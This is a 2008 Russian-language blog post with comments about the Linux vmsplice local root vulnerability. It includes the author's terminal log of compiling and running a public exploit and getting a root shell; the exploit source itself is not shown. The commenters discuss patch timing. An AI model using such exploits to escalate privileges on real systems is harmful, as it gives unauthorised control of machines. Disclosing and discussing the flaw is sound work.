Локальный Root на Linux
11 February 2008Сегодня ночью (или вчера) в сети появился код эксплоита для получения локального рута. Насколько я знаю, то уязвимости подвержены ядра c 2.6.17. На сегодняшний день выпущено ядро 2.6.24.2, в котором уязвимость уже профиксена. Получить рута от простого пользователя не сложно, имея код эксплоита, что и было проверено мной на машине:
wert2all@wert2all:~/tmp/exploid> uname -a
Linux wert2all 2.6.22.16-0.2-default #1 SMP 2008/02/01 19:36:55 UTC x86_64 x86_64 x86_64 GNU/Linux
wert2all@wert2all:~/tmp/exploid> gcc local_root.c -o local-root
wert2all@wert2all:~/tmp/exploid> ./local-root
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0×100000000000 .. 0×100000001000
[+] page: 0×100000000000
[+] page: 0×100000000038
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4038
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0×2b260abaf000 .. 0×2b260abe1000
[+] root
wert2all:~/tmp/exploid # whoami
root
wert2all:~/tmp/exploid #Это печально, даже если учесть, что у некоторых он не срабатывает с первого раза. Пока апдейта для OpenSuSE нет, но после такого должно выйти быстренько.
4 Responses to “Локальный Root на Linux”
February 11th, 2008 at 8:08 pm
А что самое замечательное, то исправлено 1 строчку:
February 14th, 2008 at 6:09 pm
ааааа, то-то же!
заэксплойтили вас, красноглазегов :-р
С ув. Горный пользователь VPS на Debian $)
February 15th, 2008 at 10:38 am
чукча не читатель, чукса писатель ? (с) Лор
Знаешь, что такое локальный? Не бумал, что исправлено в течении трёх часов? Ядро от Дябиана вышло почти сразу. Ядро моей Сюзи, уже пересобраное, красивое и без моего напильника, вишло на следующий день (может и ночью, не проверял).
А гордым пользователям краденой продукции рассказать, через сколько обновления в ОС выходят?
зы. на ядрах с патчами OpenVZ эксплоид не работал, так что поговорка с напильником для вирусов ещё актуальна.
February 15th, 2008 at 12:00 pm
не эксплоид, а эксплоит, дурашка